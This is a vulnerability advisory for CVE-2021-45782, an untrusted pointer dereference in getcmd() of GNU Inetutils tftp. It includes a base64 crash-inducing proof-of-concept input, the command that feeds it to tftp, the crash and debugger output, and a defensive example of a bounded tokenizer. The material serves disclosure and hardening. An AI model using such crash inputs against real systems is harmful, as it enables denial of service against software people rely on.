CVE-2021-45782: Untrusted Pointer Dereference in getcmd() at inetutils/src/tftp.c:878

An untrusted pointer dereference in getcmd() at inetutils/src/tftp.c of GNU Inetutils v2.2.16-cf091 can lead to a segmentation fault or application crash.


# Untrusted Pointer Dereference in getcmd() at inetutils/src/tftp.c:878

## Description

An Untrusted Pointer Dereference was discovered in getcmd() at inetutils/src/tftp.c:878. The vulnerability causes a segmentation fault and application crash.

**version**

```
./tftp --version
tftp (GNU inetutils) 2.2.16-cf091
Copyright © 2021 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later https://gnu.org/licenses/gpl.html.
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.

Written by many authors.
```

**System information**

Ubuntu 20.04 focal, AMD EPYC 7742 64-Core @ 16x 2.25GHz

## Proof of Concept

**poc**

```
base64 poc
PyA/IGIg/zc/IGIgEMoiICIgEAsgYiDKysogIiAQNyIiIyIgIiAQCyA/IGIgNwQgIP83IyIgIiAQ
CyA6uwQvHiIUYiDKysrKPyA/IGIgEMoiICIgEDciIiMiICIgEAsgPyBiIDcEICD/NyMiICIgEAsg
OrsELx4iFGIgysrKyj8gPyBiIBDKIiAiIBALIGIgysrKICIpEDciICIgEAsgYiDKysogIiAQNyIi
IABAMAsg
```

**command:**

```
./tftp < ./poc
```

**Result**

```
./tftp < poc
print help information
set mode to octet
?Invalid help command �7?
set mode to octet
?Invalid help command �"
?Invalid help command "
?Invalid help command
set mode to octet
?Invalid help command ���
?Invalid help command "
?Invalid help command 7""#"
?Invalid help command "
?Invalid help command
print help information
set mode to octet
?Invalid help command 7
?Invalid help command �7#"
?Invalid help command "
?Invalid help command
?Invalid help command :� / " b
?Invalid help command ����?
print help information
set mode to octet
?Invalid help command �"
?Invalid help command "
?Invalid help command 7""#"
?Invalid help command "
?Invalid help command
print help information
set mode to octet
?Invalid help command 7
?Invalid help command �7#"
?Invalid help command "
?Invalid help command
?Invalid help command :� / " b
?Invalid help command ����?
print help information
set mode to octet
?Invalid help command �"
?Invalid help command "
?Invalid help command
set mode to octet
?Invalid help command ���
?Invalid help command ") 7"
?Invalid help command "
?Invalid help command
set mode to octet
?Invalid help command ���
?Invalid help command "
[1] 1736392 segmentation fault ./tftp < poc
```

**gdb**

```
Program received signal SIGSEGV, Segmentation fault.
0x0000555555558bc4 in getcmd (name=0x555500000033 <error: Cannot access memory at address 0x555500000033>) at tftp.c:878
878 for (c = cmdtab; (p = c->name) != NULL; c++)
LEGEND: STACK | HEAP | CODE | DATA | RWX | RODATA
────────────────────────────────────────────[ REGISTERS ]─────────────────────────────────────────────
RAX 0x18
RBX 0x555555567b50 (margc) ◂— 0x555500000033 /* ‘3’ */
RCX 0x0
RDX 0x0
RDI 0x555500000033
RSI 0x55555556258c ◂— 0x7463656e6e6f63 /* ‘connect’ */
R8 0x0
R9 0x18
R10 0x55555556243b ◂— 0x203a70746674000a /* ‘\n’ */
R11 0x246
R12 0x555500000033
R13 0x555555562423 ◂— ‘?Invalid help command %s\n’
R14 0x0
R15 0x0
RBP 0x555555567b50 (margc) ◂— 0x555500000033 /* ‘3’ */
RSP 0x7fffffffe138 —▸ 0x555555558cce (help+78) ◂— cmp rax, -1
RIP 0x555555558bc4 (getcmd+20) ◂— movzx r9d, byte ptr [rdi]
──────────────────────────────────────────────[ DISASM ]──────────────────────────────────────────────
► 0x555555558bc4 <getcmd+20> movzx r9d, byte ptr [rdi]
0x555555558bc8 <getcmd+24> push rbx
0x555555558bc9 <getcmd+25> xor r11d, r11d
0x555555558bcc <getcmd+28> xor r10d, r10d
0x555555558bcf <getcmd+31> xor ebx, ebx
0x555555558bd1 <getcmd+33> lea r8, [rip + 0xe7c8] <0x5555555673a0>
0x555555558bd8 <getcmd+40> lea rcx, [rsi + 1]
0x555555558bdc <getcmd+44> mov rdx, rdi
0x555555558bdf <getcmd+47> mov eax, r9d
0x555555558be2 <getcmd+50> cmp byte ptr [rsi], r9b
0x555555558be5 <getcmd+53> je getcmd+80 <getcmd+80>
──────────────────────────────────────────[ SOURCE (CODE) ]───────────────────────────────────────────
In file: /home/aidai/fuzzing/inetutils/inetutils/src/tftp.c
873 register int nmatches, longest;
874
875 longest = 0;
876 nmatches = 0;
877 found = 0;
► 878 for (c = cmdtab; (p = c->name) != NULL; c++)
879 {
880 for (q = name; *q == *p++; q++)
881 if (*q == 0) /* exact match? */
882 return (c);
883
──────────────────────────────────────────────[ STACK ]───────────────────────────────────────────────
00:0000│ rsp 0x7fffffffe138 —▸ 0x555555558cce (help+78) ◂— cmp rax, -1
01:0008│ 0x7fffffffe140 —▸ 0x55555556b710 ◂— 0x0
02:0010│ 0x7fffffffe148 —▸ 0x5555555610f0 (__libc_csu_init) ◂— endbr64
03:0018│ 0x7fffffffe150 ◂— 0x33 /* ‘3’ */
04:0020│ 0x7fffffffe158 —▸ 0x5555555679c0 (margv) —▸ 0x555555567b80 (line) ◂— 0x37ff0062003f003f /* ‘?’ */
05:0028│ 0x7fffffffe160 —▸ 0x7fffffffe270 ◂— 0x1
06:0030│ 0x7fffffffe168 —▸ 0x555555557b83 (main+387) ◂— jmp 0x555555557b29
07:0038│ 0x7fffffffe170 —▸ 0x7fffffffe270 ◂— 0x1
────────────────────────────────────────────[ BACKTRACE ]─────────────────────────────────────────────
► f 0 0x555555558bc4 getcmd+20
f 1 0x555555558cce help+78
f 2 0x555555557b83 main+387
f 3 0x555555557b83 main+387
f 4 0x7ffff7de70b3 __libc_start_main+243
──────────────────────────────────────────────────────────────────────────────────────────────────────
pwndbg> bt
#0 0x0000555555558bc4 in getcmd (name=0x555500000033 <error: Cannot access memory at address 0x555500000033>) at tftp.c:878
#1 0x0000555555558cce in help (argc=<optimized out>, argv=0x555555567b50 <margc>) at tftp.c:955
#2 0x0000555555557b83 in command () at tftp.c:864
#3 main (argc=argc@entry=1, argv=argv@entry=0x7fffffffe278) at tftp.c:298
#4 0x00007ffff7de70b3 in __libc_start_main (main=0x555555557a00 <main>, argc=1, argv=0x7fffffffe278, init=<optimized out>, fini=<optimized out>, rtld_fini=<optimized out>, stack_end=0x7fffffffe268) at …/csu/libc-start.c:308
#5 0x0000555555557c0e in _start () at /usr/include/x86_64-linux-gnu/bits/stdio2.h:107
```
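The gdb listing shows the fault inside the command-lookup loop at tftp.c:878, with `name` pointing at unmapped memory (the same value the dump shows stored at `margc`). The block below is an added example, not inetutils' code: it reimplements the prefix lookup visible in the listing and pairs it with the caller-side guard a defender would want, a tokenizer that caps the argument count at its argv array's capacity so a help-style walk over argv can never read past the table. The command table, `MAXARGS` and the function bodies are constructed for this demo.

```c
#include <ctype.h>
#include <stddef.h>

/* Constructed command table in the style of tftp's cmdtab (name, handler id). */
struct cmd { const char *name; int id; };
static const struct cmd cmdtab[] = {
  { "connect", 1 }, { "mode", 2 }, { "put", 3 }, { "get", 4 }, { "quit", 5 },
  { "trace", 6 }, { "timeout", 7 }, { "?", 8 }, { "help", 8 }, { NULL, 0 }
};
#define AMBIGUOUS ((const struct cmd *)-1)
#define MAXARGS 4   /* assumed argv capacity, kept small so the cap is exercised */

/* Prefix lookup mirroring the loop at tftp.c:878-882: an exact match wins, a
 * unique prefix matches, equal-length prefix matches are ambiguous. Only NULL
 * can be rejected here; a stray non-NULL pointer looks like any other, so the
 * caller must guarantee every argv[i] it passes is a real token. */
static const struct cmd *getcmd(const char *name)
{
  const struct cmd *c, *found = NULL;
  const char *p, *q;
  int nmatches = 0, longest = 0;
  if (name == NULL) return NULL;
  for (c = cmdtab; (p = c->name) != NULL; c++) {
    for (q = name; *q == *p++; q++)
      if (*q == 0) return c;                   /* exact match */
    if (*q == 0) {                             /* name is a prefix of c->name */
      if (q - name > longest) { longest = (int)(q - name); nmatches = 1; found = c; }
      else if (q - name == longest) nmatches++;
    }
  }
  return nmatches > 1 ? AMBIGUOUS : found;
}

/* Bounded tokenizer: stores at most MAXARGS-1 tokens plus a NULL terminator,
 * so the argument count can never run past the end of the argv array. */
static int makeargv(char *line, char *argv[MAXARGS])
{
  int argc = 0;
  char *cp = line;
  while (*cp != '\0' && argc < MAXARGS - 1) {
    while (isspace((unsigned char)*cp)) cp++;   /* skip leading blanks */
    if (*cp == '\0') break;
    argv[argc++] = cp;                           /* token start */
    while (*cp != '\0' && !isspace((unsigned char)*cp)) cp++;
    if (*cp != '\0') *cp++ = '\0';               /* terminate token in place */
  }
  argv[argc] = NULL;
  return argc;
}
```

A help-style loop that walks `argv[1..argc)` over the output of this tokenizer always stops at the NULL terminator, which is the property the crashing loop lacked.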
